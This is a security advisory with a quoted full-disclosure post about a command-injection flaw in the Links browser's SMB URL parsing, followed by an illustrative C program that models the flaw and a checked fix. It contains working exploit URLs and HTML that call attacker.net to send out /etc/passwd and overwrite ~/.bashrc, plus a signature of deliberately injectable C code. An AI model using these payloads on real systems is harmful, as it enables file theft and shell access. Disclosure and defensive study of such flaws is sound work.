SecurityTracker.com
Category:   Application (Web Browser)  >   Links
Vendors:   links.sourceforge.net
Links SMB URL Parsing Bug Lets Remote Users Upload/Download Files
SecurityTracker Alert ID:  1017233
SecurityTracker URL:  http://securitytracker.com/id/1017233
CVE Reference:   CVE-2006-5925
Updated:  Jun 2 2008
Original Entry Date:  Nov 15 2006
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): 1.00pre18 and prior versions (tested on 1.00pre12 on Ubuntu)
Description:   A vulnerability was reported in Links. A remote user can cause arbitrary smbclient commands to be executed.

The code in Links that invokes smbclient does not properly parse SMB URLs. A remote user can create HTML with a specially crafted URL that, when loaded by the target user, will upload files to or download files from the target user's system.

Some demonstration exploit URLs are provided:

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit;

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit;

Teemu Salmela reported this vulnerability.

[Editor's note: From code review, it appears that the Twibright Labs Links implementation version 2.1pre24 is also affected. However, this has not been confirmed.]

Impact:   A remote user can obtain files from or create files on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  links.sourceforge.net/
Cause:   Input validation error
Underlying OS:  BeOS, Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Links smbclient command execution

Links smbclient command execution
-----------------------------------------------------------------------------
There is a flaw in the Links web browser that allows malicious web sites to
execute smbclient commands on the victim's machine. This flaw makes it
possible to read any file from the victim system (any file that the user
running links has read access to), or to upload any file to the victim system
(any file that the user running links can create/overwrite). The attacker
could, for example, upload ~/.bashrc to gain shell access.

Version numbers:
-----------------------------------------------------------------------------
I tested this on Ubuntu 6.06 LTS and Links 1.00pre12. Smbclient must also
be installed.

Vulnerable code:
-----------------------------------------------------------------------------
smb_func() in smb.c:
    ...
    if (*share) {
            if (!*dir || dir[strlen(dir) - 1] == '/' || dir[strlen(dir) - 1] == '\\') {
                    if (dir) {
                            v[n++] = "-D";
                            v[n++] = dir;
                    }
                    v[n++] = "-c";
                    v[n++] = "ls";
            } else {
                    unsigned char *ss;
                    unsigned char *s = stracpy("get \"");
'dir' is the directory part of the smb://.. url:
                    add_to_strn(&s, dir);
                    add_to_strn(&s, "\" -");
                    while ((ss = strchr(s, '/'))) *ss = '\\';
                    v[n++] = "-c";
                    v[n++] = s;
            }
    }
    v[n++] = NULL;
smbclient is executed:
    execvp("smbclient", (char **)v);
    fprintf(stderr, "smbclient not found in $PATH");
    _exit(1);
    ...

Exploit:
-----------------------------------------------------------------------------
<html>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '>Put /etc/passwd</a>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit; '>Get .bashrc</a>
</html>

-- 
fscanf(socket,"%s",buf); printf(buf);
sprintf(query, "SELECT %s FROM table", buf);
sprintf(cmd, "echo %s | sqlquery", query); system(cmd);
Teemu Salmela 
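
Added example (not part of the original advisory or of the Links source): a small C program that rebuilds the `get "<dir>" -` string the way the quoted smb_func() does, counts the commands that result when ';' separates smbclient commands as in the demonstration URLs, and shows a checked builder that refuses such input. The function names, the constructed sample string and the rejection rule are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Same construction as the quoted smb_func(): get "<dir>" - with no escaping. */
int build_get_cmd(const char *dir, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "get \"%s\" -", dir);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    for (char *p = out; *p; p++)
        if (*p == '/')
            *p = '\\';
    return 0;
}

/* Simplified model (assumption): count the commands smbclient would see
 * when ';' separates commands in the -c string. */
int count_commands(const char *cmd)
{
    int count = 0, in_cmd = 0;
    for (; *cmd; cmd++) {
        if (*cmd == ';') {
            in_cmd = 0;
        } else if (*cmd != ' ' && !in_cmd) {
            in_cmd = 1;
            count++;
        }
    }
    return count;
}

/* Checked variant: reject paths that can close the quote or start a command. */
int build_get_cmd_checked(const char *dir, char *out, size_t outlen)
{
    for (const unsigned char *p = (const unsigned char *)dir; *p; p++)
        if (*p == '"' || *p == ';' || *p < 0x20 || *p == 0x7f)
            return -1;
    return build_get_cmd(dir, out, outlen);
}

int main(void)
{
    char buf[256];
    const char *hostile = "a\" b; help; exit;";   /* constructed sample */
    build_get_cmd(hostile, buf, sizeof buf);
    printf("%s -> %d commands\n", buf, count_commands(buf));
    printf("checked: %d\n", build_get_cmd_checked(hostile, buf, sizeof buf));
    return 0;
}
```

The unchecked builder turns the single intended `get` into four command segments for the constructed input, while the checked builder returns -1 and never produces a command string.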

